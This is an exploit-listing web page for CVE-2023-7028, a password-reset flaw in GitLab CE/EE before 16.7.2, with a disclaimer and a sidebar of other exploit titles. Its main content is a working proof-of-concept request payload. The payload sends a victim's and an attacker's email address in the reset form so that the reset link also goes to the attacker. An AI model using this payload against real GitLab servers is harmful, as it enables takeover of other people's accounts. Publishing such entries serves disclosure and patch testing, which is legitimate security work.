Gitlab ce/ee < 16.7.2 password reset Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-14 | Type : remote | Platform : java
This exploit / vulnerability Gitlab ce/ee < 16.7.2 password reset is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455

# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com

Gitlab ce/ee < 16.7.2 password reset


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Gitlab ce/ee < 16.7.2 password reset Vulnerability / Exploit